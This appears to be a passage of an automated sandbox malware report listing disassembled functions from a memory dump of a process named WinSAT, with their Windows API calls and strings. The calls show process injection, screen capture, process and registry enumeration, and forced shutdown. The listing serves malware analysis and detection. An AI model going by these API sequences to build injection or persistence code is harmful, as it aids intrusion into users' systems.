Part of subcall function 01D154A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 01D157CE
Part of subcall function 01D154A9: SelectObject.GDI32(00000000,?), ref: 01D157E4
Part of subcall function 01D154A9: DeleteDC.GDI32(00000000), ref: 01D157EB
Part of subcall function 01D154A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01D15813
Part of subcall function 01D154A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 01D15829

SetEvent.KERNEL32(01D32868,?,00000001), ref: 01D15C69
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 01D15C76

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1B0AD, Relevance: 7.5, APIs: 5, Instructions: 32

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 01D1B0B3
ReleaseMutex.KERNEL32(?), ref: 01D1B0E7
IsWindow.USER32(?), ref: 01D1B0EE
PostMessageW.USER32(?,00000215,00000000,?), ref: 01D1B108
SendMessageW.USER32(?,00000215,00000000,?), ref: 01D1B110

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D19009, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 01D274DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01D17194,?,?,00000104,.exe,00000000), ref: 01D274F4
Part of subcall function 01D274DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01D17194,?,?,00000104), ref: 01D27575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 01D1906B
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 01D190BB

Part of subcall function 01D28AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 01D28B23
Part of subcall function 01D28AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01D28B4A
Part of subcall function 01D28AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 01D28B94
Part of subcall function 01D28AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 01D28BC1
Part of subcall function 01D28AE4: Sleep.KERNEL32(00000000,?,?), ref: 01D28BF1
Part of subcall function 01D28AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 01D28C1F
Part of subcall function 01D28AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 01D28C31

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Strings

#, xrefs: 01D19093
&, xrefs: 01D190A1

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D198B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 01D274DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01D17194,?,?,00000104,.exe,00000000), ref: 01D274F4
Part of subcall function 01D274DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01D17194,?,?,00000104), ref: 01D27575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 01D1991B
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 01D1996B

Part of subcall function 01D28AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 01D28B23
Part of subcall function 01D28AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01D28B4A
Part of subcall function 01D28AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 01D28B94
Part of subcall function 01D28AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 01D28BC1
Part of subcall function 01D28AE4: Sleep.KERNEL32(00000000,?,?), ref: 01D28BF1
Part of subcall function 01D28AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 01D28C1F
Part of subcall function 01D28AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 01D28C31

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Strings

&, xrefs: 01D1994A
#, xrefs: 01D19951

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D22828, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52

APIs

Part of subcall function 01D235C6: MultiByteToWideChar.KERNEL32(01D22884,00000000,?,01D21FF2,?,7718F8FF,01D22884,00000000,00000032,?,7718F8FF,00000000), ref: 01D235DD

Part of subcall function 01D28C40: PathCombineW.SHLWAPI(01D21F45,01D21F45,?), ref: 01D28C5F

PathRenameExtensionW.SHLWAPI(?,.dat), ref: 01D228A1

Strings

C:\Users\admin\AppData\Roaming, xrefs: 01D22870, 01D22888
.dat, xrefs: 01D2289B
SOFTWARE\Microsoft, xrefs: 01D22855

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1E0FB, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47

APIs

GetCurrentThreadId.KERNEL32(7718F8FF), ref: 01D1E108
GetThreadDesktop.USER32(00000000), ref: 01D1E10F
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 01D1E128

Part of subcall function 01D1DD09: TlsAlloc.KERNEL32(01D32868,00000000,0000018C,00000000,00000000), ref: 01D1DD22
Part of subcall function 01D1DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 01D1DD4A
Part of subcall function 01D1DD09: CreateEventW.KERNEL32(01D32C30,00000001,00000000,?,84889912,?,00000001), ref: 01D1DD74
Part of subcall function 01D1DD09: CreateMutexW.KERNEL32(01D32C30,00000000,?,18782822,?,00000001), ref: 01D1DD97
Part of subcall function 01D1DD09: CreateFileMappingW.KERNEL32(00000000,01D32C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 01D1DDC2
Part of subcall function 01D1DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 01D1DDD8
Part of subcall function 01D1DD09: GetDC.USER32(00000000), ref: 01D1DDF5
Part of subcall function 01D1DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 01D1DE15
Part of subcall function 01D1DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 01D1DE1F
Part of subcall function 01D1DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 01D1DE32
Part of subcall function 01D1DD09: ReleaseDC.USER32(00000000,?), ref: 01D1DE56
Part of subcall function 01D1DD09: CreateMutexW.KERNEL32(01D32C30,00000000,?,1898B122,?,00000001,01D328B8,?,00000102,01D328A4,01D32E70,00000010,?,?), ref: 01D1DF00
Part of subcall function 01D1DD09: GetDC.USER32(00000000), ref: 01D1DF15
Part of subcall function 01D1DD09: CreateCompatibleDC.GDI32(00000000), ref: 01D1DF23
Part of subcall function 01D1DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 01D1DF3A
Part of subcall function 01D1DD09: SelectObject.GDI32(00000000,00000000), ref: 01D1DF4D
Part of subcall function 01D1DD09: ReleaseDC.USER32(00000000,00000001), ref: 01D1DF65

Part of subcall function 01D1DF74: DeleteObject.GDI32(00000000), ref: 01D1DF87
Part of subcall function 01D1DF74: CloseHandle.KERNEL32(00000000), ref: 01D1DF97
Part of subcall function 01D1DF74: TlsFree.KERNEL32(00000000,00000000,01D32868,00000000,01D1E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01D1DFA2
Part of subcall function 01D1DF74: CloseHandle.KERNEL32(00000000), ref: 01D1DFB0
Part of subcall function 01D1DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,01D32868,00000000,01D1E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01D1DFBA
Part of subcall function 01D1DF74: CloseHandle.KERNEL32(00000000), ref: 01D1DFC7
Part of subcall function 01D1DF74: SelectObject.GDI32(00000000,00000000), ref: 01D1DFE1
Part of subcall function 01D1DF74: DeleteObject.GDI32(00000000), ref: 01D1DFF2
Part of subcall function 01D1DF74: DeleteDC.GDI32(00000000), ref: 01D1DFFF
Part of subcall function 01D1DF74: CloseHandle.KERNEL32(00000000), ref: 01D1E010
Part of subcall function 01D1DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01D1E01F
Part of subcall function 01D1DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 01D1E038

Strings

N, xrefs: 01D1E132

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D287C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 01D287D7

Part of subcall function 01D246F4: GetTickCount.KERNEL32(01D28766,?), ref: 01D246F4

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

Part of subcall function 01D28C40: PathCombineW.SHLWAPI(01D21F45,01D21F45,?), ref: 01D28C5F

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 01D28829

Strings

%s%08x, xrefs: 01D287F2
tmp, xrefs: 01D287ED

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1F367, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 01D1F3CC

Part of subcall function 01D2D325: PathRemoveFileSpecW.SHLWAPI(?), ref: 01D2D34A
Part of subcall function 01D2D325: PathRemoveFileSpecW.SHLWAPI(?), ref: 01D2D35D
Part of subcall function 01D2D325: SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 01D2D39B
Part of subcall function 01D2D325: CharToOemW.USER32(?,?), ref: 01D2D3B7
Part of subcall function 01D2D325: CharToOemW.USER32(?,?), ref: 01D2D3C6
Part of subcall function 01D2D325: ExitProcess.KERNEL32(00000000), ref: 01D2D41C

Part of subcall function 01D1E959: CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,01D14E69,?,?,?,743C152E,00000002), ref: 01D1E97F

ExitWindowsEx.USER32(00000014,80000000), ref: 01D1F3DF

Part of subcall function 01D24A87: GetCurrentThread.KERNEL32(00000020,00000000,01D2C9A1,00000000,?,?,?,?,01D2C9A1,SeTcbPrivilege), ref: 01D24A97
Part of subcall function 01D24A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,01D2C9A1,SeTcbPrivilege), ref: 01D24A9E
Part of subcall function 01D24A87: OpenProcessToken.ADVAPI32(000000FF,00000020,01D2C9A1,?,?,?,?,01D2C9A1,SeTcbPrivilege), ref: 01D24AB0
Part of subcall function 01D24A87: LookupPrivilegeValueW.ADVAPI32(00000000,01D2C9A1,?), ref: 01D24AD4
Part of subcall function 01D24A87: AdjustTokenPrivileges.ADVAPI32(01D2C9A1,00000000,00000001,00000000,00000000,00000000), ref: 01D24AE9
Part of subcall function 01D24A87: GetLastError.KERNEL32 ref: 01D24AF3
Part of subcall function 01D24A87: CloseHandle.KERNEL32(01D2C9A1), ref: 01D24B02

Strings

SeShutdownPrivilege, xrefs: 01D1F3AB
, xrefs: 01D1F383

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D289C2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathSkipRootW.SHLWAPI(?), ref: 01D289CD
GetFileAttributesW.KERNEL32(?,?,00000000,01D2D261,?,?,?,?,?), ref: 01D289F5
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,01D2D261,?,?,?,?,?), ref: 01D28A03

Strings

.exe, xrefs: 01D289C9

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D15ECF, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathRemoveFileSpecW.SHLWAPI(01D325D0), ref: 01D15F07
PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 01D15F23

Part of subcall function 01D289C2: PathSkipRootW.SHLWAPI(?), ref: 01D289CD
Part of subcall function 01D289C2: GetFileAttributesW.KERNEL32(?,?,00000000,01D2D261,?,?,?,?,?), ref: 01D289F5
Part of subcall function 01D289C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,01D2D261,?,?,?,?,?), ref: 01D28A03

Part of subcall function 01D26A3C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 01D26A5B
Part of subcall function 01D26A3C: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 01D26A77
Part of subcall function 01D26A3C: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 01D26A8E
Part of subcall function 01D26A3C: LocalFree.KERNEL32(00000000), ref: 01D26A9D

GetFileAttributesW.KERNEL32(01D323C8,01D325D0,01D325D0,00000000,00020000,01D169C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 01D15F46

Part of subcall function 01D22828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 01D228A1

Strings

.tmp, xrefs: 01D15F1D

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D21E2D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 01D21E4B
PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 01D21E5A
GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 01D21E6E

Strings

C:\Users\admin\AppData\Roaming, xrefs: 01D21E3D, 01D21E42, 01D21E59

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D24BC2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,01D21DBB,00000000,01D222ED), ref: 01D24BCF
GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,01D21DBB,00000000,01D222ED), ref: 01D24BDF

Strings

IsWow64Process, xrefs: 01D24BD9
kernel32.dll, xrefs: 01D24BCA

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2A24F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22

APIs

EnterCriticalSection.KERNEL32(Function_00023F24), ref: 01D2A265
SetEvent.KERNEL32(?), ref: 01D2A286
LeaveCriticalSection.KERNEL32(Function_00023F24), ref: 01D2A28D

Strings

3, xrefs: 01D2A256

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D20AA1, Relevance: 6.3, APIs: 4, Instructions: 303

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01D20C73
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01D20C93
RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01D20CA6
GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01D20CB5

Part of subcall function 01D23346: HeapAlloc.KERNEL32(00000008,-00000003,01D236F5,?,?,00000000,01D241E1,?,01D22070,?,?,?,01D24191,?,?,?), ref: 01D23368
Part of subcall function 01D23346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,01D236F5,?,?,00000000,01D241E1,?,01D22070,?,?,?,01D24191,?,?), ref: 01D23379

Part of subcall function 01D24660: CryptAcquireContextW.ADVAPI32(01D28C87,00000000,00000000,00000001,F0000040,?,01D28C87,?,00000030,?,?,?,01D291A0,01D33EC0), ref: 01D24679
Part of subcall function 01D24660: CryptCreateHash.ADVAPI32(01D28C87,00008003,00000000,00000000,00000030,?,01D28C87,?,00000030,?,?,?,01D291A0,01D33EC0), ref: 01D24691
Part of subcall function 01D24660: CryptHashData.ADVAPI32(00000030,00000010,01D28C87,00000000,?,01D28C87), ref: 01D246AD
Part of subcall function 01D24660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,01D28C87), ref: 01D246C5
Part of subcall function 01D24660: CryptDestroyHash.ADVAPI32(00000030,?,01D28C87), ref: 01D246DC
Part of subcall function 01D24660: CryptReleaseContext.ADVAPI32(01D28C87,00000000,?,01D28C87,?,00000030,?,?,?,01D291A0,01D33EC0), ref: 01D246E6

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1A088, Relevance: 6.2, APIs: 4, Instructions: 184

APIs

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 01D1A12E
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 01D1A159
RegCloseKey.ADVAPI32(?), ref: 01D1A28F

Part of subcall function 01D274DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01D17194,?,?,00000104,.exe,00000000), ref: 01D274F4
Part of subcall function 01D274DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01D17194,?,?,00000104), ref: 01D27575

Part of subcall function 01D27595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,01D29E26,?,?), ref: 01D275AD

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 01D1A27C

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1A61C, Relevance: 6.2, APIs: 4, Instructions: 176

APIs

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 01D1A6AA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 01D1A6D5
RegCloseKey.ADVAPI32(?), ref: 01D1A80C

Part of subcall function 01D274DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01D17194,?,?,00000104,.exe,00000000), ref: 01D274F4
Part of subcall function 01D274DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01D17194,?,?,00000104), ref: 01D27575

Part of subcall function 01D27595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,01D29E26,?,?), ref: 01D275AD

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 01D1A7F9

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2B265, Relevance: 6.1, APIs: 4, Instructions: 129

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 01D2B28C

Part of subcall function 01D28C40: PathCombineW.SHLWAPI(01D21F45,01D21F45,?), ref: 01D28C5F

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 01D2B2E0

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 01D2B343
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 01D2B36F

Part of subcall function 01D2B3EC: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 01D2B437
Part of subcall function 01D2B3EC: WriteFile.KERNEL32(01D2B3D4,?,00000146,?,00000000), ref: 01D2B475
Part of subcall function 01D2B3EC: WriteFile.KERNEL32(01D2B3D4,?,00000000,?,00000000), ref: 01D2B499
Part of subcall function 01D2B3EC: FlushFileBuffers.KERNEL32(01D2B3D4), ref: 01D2B4AD
Part of subcall function 01D2B3EC: CloseHandle.KERNEL32(01D2B3D4), ref: 01D2B4B6

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D27D14, Relevance: 6.1, APIs: 4, Instructions: 94

APIs

IsBadReadPtr.KERNEL32(01D10000,?), ref: 01D27D30
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 01D27D4E
WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,01D10000,?,?,00000000,?,00000000), ref: 01D27DE0

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

VirtualFreeEx.KERNEL32(?,?,00000000,00008000,01D10000,?,?,00000000,?,00000000), ref: 01D27E05

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D22542, Relevance: 6.1, APIs: 4, Instructions: 87

APIs

Part of subcall function 01D27D14: IsBadReadPtr.KERNEL32(01D10000,?), ref: 01D27D30
Part of subcall function 01D27D14: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 01D27D4E
Part of subcall function 01D27D14: WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,01D10000,?,?,00000000,?,00000000), ref: 01D27DE0
Part of subcall function 01D27D14: VirtualFreeEx.KERNEL32(?,?,00000000,00008000,01D10000,?,?,00000000,?,00000000), ref: 01D27E05

DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 01D22574
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,01D2316D,?,00000000,?,?,00000000), ref: 01D225AB
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,01D2316D,?,00000000,?,?,00000000), ref: 01D225CB

Part of subcall function 01D21D15: DuplicateHandle.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,00000002), ref: 01D21D3B
Part of subcall function 01D21D15: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,00000000,?,01D225E9,00000000,?,?,?,?,01D2316D,?), ref: 01D21D4F
Part of subcall function 01D21D15: DuplicateHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 01D21D69

VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,01D2316D,?,00000000), ref: 01D2261A

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2984E, Relevance: 6.1, APIs: 4, Instructions: 86

APIs

CoCreateInstance.OLE32(01D115B0,00000000,00004401,01D115A0,?), ref: 01D29874
#8.OLEAUT32(?,?,?,?,?,?,?,?,?,01D185BE,?,?), ref: 01D298C0
#2.OLEAUT32(?,?,?,?,?,?,?,?,?,01D185BE,?,?), ref: 01D298D0
#9.OLEAUT32(?,?,?,?,?,?,?,?,?,?,01D185BE,?,?), ref: 01D29909

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D29372, Relevance: 6.1, APIs: 4, Instructions: 84

APIs

Part of subcall function 01D286BF: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 01D286D4

Part of subcall function 01D2869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 01D286B1

WriteFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 01D293F3
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 01D2940C
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 01D29430
FlushFileBuffers.KERNEL32(?), ref: 01D29438

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D15B28, Relevance: 6.1, APIs: 4, Instructions: 69

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 01D15B40

Part of subcall function 01D24DCA: CloseHandle.KERNEL32(00000000), ref: 01D24DD9
Part of subcall function 01D24DCA: CloseHandle.KERNEL32(00000000), ref: 01D24DE2

Part of subcall function 01D22828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 01D228A1

ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 01D15B9A
WaitForSingleObject.KERNEL32(?,000003E8), ref: 01D15BD6
TerminateProcess.KERNEL32(?,00000000), ref: 01D15BE3

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1BB5F, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

Part of subcall function 01D22507: CreateMutexW.KERNEL32(01D32C30,00000000,?,?,?,?,?), ref: 01D22528

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

GetCurrentThread.KERNEL32(000000F1,19367401,00000001), ref: 01D1BB89
SetThreadPriority.KERNEL32(00000000), ref: 01D1BB90
WaitForSingleObject.KERNEL32(00001388), ref: 01D1BBA8

Part of subcall function 01D231CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01D231ED
Part of subcall function 01D231CC: Process32FirstW.KERNEL32(000001E6,?), ref: 01D23216
Part of subcall function 01D231CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 01D23271
Part of subcall function 01D231CC: CloseHandle.KERNEL32(00000000), ref: 01D2328E
Part of subcall function 01D231CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 01D232A1
Part of subcall function 01D231CC: CloseHandle.KERNEL32(?), ref: 01D2330E
Part of subcall function 01D231CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 01D2331A
Part of subcall function 01D231CC: CloseHandle.KERNEL32(000001E6), ref: 01D2332B

WaitForSingleObject.KERNEL32(00001388), ref: 01D1BBBD

Part of subcall function 01D26B8E: ReleaseMutex.KERNEL32(00000000,01D23021,?,?,?), ref: 01D26B92

Memory Dump Source

